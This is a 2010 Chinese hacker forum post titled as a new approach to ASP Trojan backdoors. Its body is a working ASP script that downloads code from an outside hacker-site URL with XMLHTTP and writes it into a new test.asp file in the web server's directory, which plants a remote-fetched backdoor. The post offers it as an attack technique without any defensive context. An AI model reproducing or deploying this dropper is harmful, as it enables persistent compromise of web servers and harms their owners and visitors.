[原创] ASP木马后门新思路

主题	好友	1936 积分

金牌会员

发消息

发表于 2010-1-18 23:24:26 |显示全部楼层

《新概念黑客基地》技术文章
<%
Function GetPage(url)
dim Retrieval
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False ', "", ""
.Send
GetPage = BytesToBstr(.ResponseBody)
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
on error resume next
Url="http://www.heibai.org/hacker/daemon.txt"
response.write "开始取得远程代码........"
wstr = GetPage(Url)

Set fs=Server.CreateObject("Scripting.FileSystemObject")

Set CrFi=fs.CreateTextFile(server.MapPath("./")&"\test.asp")
Crfi.Writeline(wstr)
set CrFi=nothing
set fs=nothing
response.write "...生成test.asp文件成功"
%>

使用道具举报